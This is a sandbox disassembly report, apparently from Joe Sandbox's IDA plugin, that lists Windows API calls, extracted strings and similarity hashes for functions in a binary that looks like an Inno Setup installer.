                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                              • String ID: Explorer
                                                              • API String ID: 2594429197-512347832
                                                              • Opcode ID: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                              • Instruction ID: b0d998c5e58c3251a46d3edbb0a2afbc6be3b3781793d4cbec8386629f90fe5f
                                                              • Opcode Fuzzy Hash: e51ab44d2e52b3d60675834673e9b9904728f2271d1ef9b75da4c79774d1131e
                                                              • Instruction Fuzzy Hash: FA21E7307403446AEB10FF795C57F9A7698DB09709F5040BFF605EA1C3EA7C8908866D
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                              • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8), ref: 004782E8
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,02112BD8,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                              • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                              • API String ID: 2704155762-2318956294
                                                              • Opcode ID: 626e47d356fab76083b756a204e0250164ee9b03011d355f3d3167744cb8654e
                                                              • Instruction ID: d6ca79aa4c48c3adffb9da4b01ee7f27494699adf3768a2d59cb90ace03db172
                                                              • Opcode Fuzzy Hash: 626e47d356fab76083b756a204e0250164ee9b03011d355f3d3167744cb8654e
                                                              • Instruction Fuzzy Hash: 5701C4707C0B0466E520316E4D8AFEB554C8B54B69F54813F7E0CEA2C2DDAE8D06016E
                                                              APIs
                                                              • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                              • LocalFree.KERNEL32(005824A0,00000000,00401B68), ref: 00401ACF
                                                              • VirtualFree.KERNEL32(?,00000000,00008000,005824A0,00000000,00401B68), ref: 00401AEE
                                                              • LocalFree.KERNEL32(005834A0,?,00000000,00008000,005824A0,00000000,00401B68), ref: 00401B2D
                                                              • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                              • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                              • String ID: t:X
                                                              • API String ID: 3782394904-3969916449
                                                              • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                              • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                              • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                              • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,0045A2F2,?,00000000,00000000,00000000,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045A236
                                                                • Part of subcall function 004543E0: FindClose.KERNEL32(000000FF,004544D6), ref: 004544C5
                                                              Strings
                                                              • Failed to delete directory (%d). Will retry later., xrefs: 0045A24F
                                                              • Stripped read-only attribute., xrefs: 0045A1F8
                                                              • Failed to delete directory (%d)., xrefs: 0045A2CC
                                                              • Deleting directory: %s, xrefs: 0045A1BF
                                                              • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 0045A2AB
                                                              • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 0045A210
                                                              • Failed to strip read-only attribute., xrefs: 0045A204
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseErrorFindLast
                                                              • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                              • API String ID: 754982922-1448842058
                                                              • Opcode ID: 3a6653ca049153ac913e3aecd6f83d976b01ed6d176f23095ac7eac981277501
                                                              • Instruction ID: e72d66395cbcced70a1ff0d39e5b36b51bb4b2a363b16cebf3a96f2a9050ba33
                                                              • Opcode Fuzzy Hash: 3a6653ca049153ac913e3aecd6f83d976b01ed6d176f23095ac7eac981277501
                                                              • Instruction Fuzzy Hash: 9A41A730A042449ACB00DBA988463AE76A55F4930AF5486BBBC04D7393CB7D8E1D875F
                                                              APIs
                                                              • GetCapture.USER32 ref: 00422EB4
                                                              • GetCapture.USER32 ref: 00422EC3
                                                              • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                              • ReleaseCapture.USER32 ref: 00422ECE
                                                              • GetActiveWindow.USER32 ref: 00422EDD
                                                              • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                              • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                              • GetActiveWindow.USER32 ref: 00422FCF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CaptureMessageSend$ActiveWindow$Release
                                                              • String ID:
                                                              • API String ID: 862346643-0
                                                              • Opcode ID: f8c2677d6609ac077b52c6186ee7afb2eac2e0eedff02b6813b422cc668acf14
                                                              • Instruction ID: 0c1e69f79f034fd7694da938dfb4ae80f60ee9794ae3f0b0e2c785ff7ec3c7d8
                                                              • Opcode Fuzzy Hash: f8c2677d6609ac077b52c6186ee7afb2eac2e0eedff02b6813b422cc668acf14
                                                              • Instruction Fuzzy Hash: E4413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF500AB392DB78AE40DB5D
                                                              APIs
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0042F2CA
                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0042F2E1
                                                              • GetActiveWindow.USER32 ref: 0042F2EA
                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F317
                                                              • SetActiveWindow.USER32(?,0042F447,00000000,?), ref: 0042F338
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Window$ActiveLong$Message
                                                              • String ID:
                                                              • API String ID: 2785966331-0
                                                              • Opcode ID: 511403c039d27e5fd3d4a37a0efbe646b1f0bba5a7b321b537e6f3b04ffedf77
                                                              • Instruction ID: 0493a3c03df3966e51b4b777c60d25e7c68e0b9e8cdf2dbcd65ae894a3a71964
                                                              • Opcode Fuzzy Hash: 511403c039d27e5fd3d4a37a0efbe646b1f0bba5a7b321b537e6f3b04ffedf77
                                                              • Instruction Fuzzy Hash: 7631B471A00654AFDB01EFB5DC52E6EBBB8EB09714B91447AF804E3691D738AD10CB58
                                                              APIs
                                                              • 73A1A570.USER32(00000000), ref: 0042949A
                                                              • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                              • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                              • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                              • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                              • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                              • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                              • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                              • String ID:
                                                              • API String ID: 361401722-0
                                                              • Opcode ID: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                              • Instruction ID: f9189b99ec718bdc55f682ba078bc6b9c4dab98ca430e676b6dc028aca6f8884
                                                              • Opcode Fuzzy Hash: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                              • Instruction Fuzzy Hash: 3301E1917087513BFB11B67A9CC2F6B61C8CB8435CF44043FFA459A3D2D96C9C80866A
                                                              APIs
                                                              • 73A1A570.USER32(00000000,?,00419069,004985AE), ref: 0041DE37
                                                              • 73A24620.GDI32(00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE41
                                                              • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE4E
                                                              • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                              • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                              • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                              • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                              • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ObjectStock$A24620A480A570IconLoad
                                                              • String ID:
                                                              • API String ID: 3573811560-0
                                                              • Opcode ID: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                              • Instruction ID: 4e0a0a69a1fbcc37fa68332f5170e2556ef2fd96a8c36c1a21edcb526b0e3b4b
                                                              • Opcode Fuzzy Hash: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                              • Instruction Fuzzy Hash: E11100B06457015AE740FF666A92BA63694D724708F00813FF605AF3D2D7792C449B9E
                                                              APIs
                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 004636B0
                                                              • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463745), ref: 004636B6
                                                              • SetCursor.USER32(?,0046372D,00007F02,00000000,00463745), ref: 00463720
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Cursor$Load
                                                              • String ID: $ $Internal error: Item already expanding
                                                              • API String ID: 1675784387-1948079669
                                                              • Opcode ID: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
                                                              • Instruction ID: 5f7148262a90782ca5f39c73a98182432cf514ee5891adbc4e31059349ad3c9c
                                                              • Opcode Fuzzy Hash: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
                                                              • Instruction Fuzzy Hash: EEB19270600284DFD710DF29C585B9ABBF1AF04319F14C4AAE8459B792E778EE48CF5A
                                                              APIs
                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringWrite
                                                              • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                              • API String ID: 390214022-3304407042
                                                              • Opcode ID: 4808755b3c6221495a972d98e090ec94bd7c13575b017f43438820c08e4f7dc1
                                                              • Instruction ID: f7f3e57e327ad0b7fc32dd9a0c0ef844c3cf52932767352b59a94e8a2e0b7a1e
                                                              • Opcode Fuzzy Hash: 4808755b3c6221495a972d98e090ec94bd7c13575b017f43438820c08e4f7dc1
                                                              • Instruction Fuzzy Hash: 0E910534E001099BDB01EFA5D842BDEB7F5EF4874AF50806AE90077292D7786E49CB59
                                                              APIs
                                                              • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476BC5
                                                              • 73A259E0.USER32(00000000,000000FC,00476B20,00000000,00476E04,?,00000000,00476E2E), ref: 00476BEC
                                                              • GetACP.KERNEL32(00000000,00476E04,?,00000000,00476E2E), ref: 00476C29
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476C6F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: A259ClassInfoMessageSend
                                                              • String ID: COMBOBOX$Inno Setup: Language
                                                              • API String ID: 3217714596-4234151509
                                                              • Opcode ID: 93cc19c1f2ae3cdeb94a735bb7db030fa770b3f4550c722f8e96ab60bc3149ff
                                                              • Instruction ID: 76a62d5c2b18ddabed1a1f2db415f61daf58d6c828ad3828204ddc2489713d7e
                                                              • Opcode Fuzzy Hash: 93cc19c1f2ae3cdeb94a735bb7db030fa770b3f4550c722f8e96ab60bc3149ff
                                                              • Instruction Fuzzy Hash: 4E813C346006059FC720DF69C985AEAB7F2FB09304F1580BAE849E7762D738ED41CB59
                                                              APIs
                                                              • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                                • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale$DefaultSystem
                                                              • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                              • API String ID: 1044490935-665933166
                                                              • Opcode ID: c01586f9bbb032a7f0f1a98200a37c80c0f70fbac98b28b944ff8a28395f8419
                                                              • Instruction ID: bf07bec6589cb82417a29d9109d5e68838e6a5c97ac1b9e4b464d3d1e075229e
                                                              • Opcode Fuzzy Hash: c01586f9bbb032a7f0f1a98200a37c80c0f70fbac98b28b944ff8a28395f8419
                                                              • Instruction Fuzzy Hash: 55513E24B00108ABD701FBA69E41A9E77A9DB94304F50C07FA541BB3C7DA3DDE05975D
                                                              APIs
                                                              • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                              • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                              • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                              • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Menu$Insert$Create$ItemPopupVersion
                                                              • String ID: ,$?
                                                              • API String ID: 2359071979-2308483597
                                                              • Opcode ID: 0b2693d76eb6c03a37913dcbbd37782b63df6b44dbfb9d662716933429e9dd30
                                                              • Instruction ID: df95c3f439c97799bb0998fa3429798e8a176efd4e8e18b788060c5868d8049e
                                                              • Opcode Fuzzy Hash: 0b2693d76eb6c03a37913dcbbd37782b63df6b44dbfb9d662716933429e9dd30
                                                              • Instruction Fuzzy Hash: BA51F674A00144ABDB10EF6ADC816DA7BF9AF09304B11857BF914E73A6E738DD41CB58
                                                              APIs
                                                              • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                              • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                              • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                              • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                              • DeleteObject.GDI32(?), ref: 0041BFAF
                                                              • DeleteObject.GDI32(?), ref: 0041BFB8
                                                              • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Object$BitmapBitsDelete$CreateIcon
                                                              • String ID:
                                                              • API String ID: 1030595962-0
                                                              • Opcode ID: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                              • Instruction ID: 0934d86ca8fb123134a847d885dc0ae0ba41a9d0998c4bba382ea8cf266d8dc0
                                                              • Opcode Fuzzy Hash: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                              • Instruction Fuzzy Hash: 5A510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                              APIs
                                                              • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                              • 73A24620.GDI32(00000000,00000026), ref: 0041CF2D
                                                              • 73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                              • 73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                              • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                              • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                              • 73A18830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Stretch$A18830$A122A24620BitsMode
                                                              • String ID:
                                                              • API String ID: 430401518-0
                                                              • Opcode ID: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                              • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                              • Opcode Fuzzy Hash: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                              • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                              APIs
                                                              • SendMessageA.USER32(00000000,?,?), ref: 00457166
                                                                • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                • Part of subcall function 0041EEB4: 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                                • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571CD
                                                              • TranslateMessage.USER32(?), ref: 004571EB
                                                              • DispatchMessageA.USER32(?), ref: 004571F4
                                                              Strings
                                                              Memory Dump Source
